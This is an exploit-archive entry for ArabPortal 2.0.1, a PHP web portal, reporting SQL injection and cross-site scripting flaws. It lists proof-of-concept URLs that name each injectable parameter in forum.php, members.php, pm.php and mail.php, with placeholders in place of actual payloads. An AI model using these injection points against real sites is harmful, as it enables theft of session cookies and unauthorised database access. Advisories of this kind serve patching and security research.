[] NeoSense

ArabPortal 2.0.1 - Multiple Input Validation Vulnerabilities

Author: o.y.6
type: webapps
platform: php
port: 
date_added: 2006-04-04 
date_updated: 2013-08-14 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/17375/info

ArabPortal is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

Successful exploitation of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.

http://www.example.com/forum.php?mineID=[SQL Injection]

http://www.example.com/forum.php?action=view&id=1&cat_id=3&adminJump=D3vil-0x1[HTML - XSS ]
http://www.example.com/forum.php?action=view&id=1&cat_id=3&forum_middle=D3vil-0x1[HTML - XSS ]
http://www.example.com/members.php?action=changepass&form=D3vil-0x1[HTML - XSS ]
http://www.example.com/members.php?action=edit&form=D3vil-0x1[HTML - XSS ]
http://www.example.com/pm.php?action=reply&form=D3vil-0x1[HTML - XSS ]
http://www.example.com/pm.php?action=sendmsg&form=D3vil-0x1[HTML - XSS ]
http://www.example.com/mail.php?action=sendpage&form=D3vil-0x1[HTML - XSS ]
http://www.example.com/mail.php?action=sendtome&form=D3vil-0x1[HTML - XSS ]
http://www.example.com/mail.php?action=sendtousers&userid=1&form=D3vil-0x1[HTML - XSS ]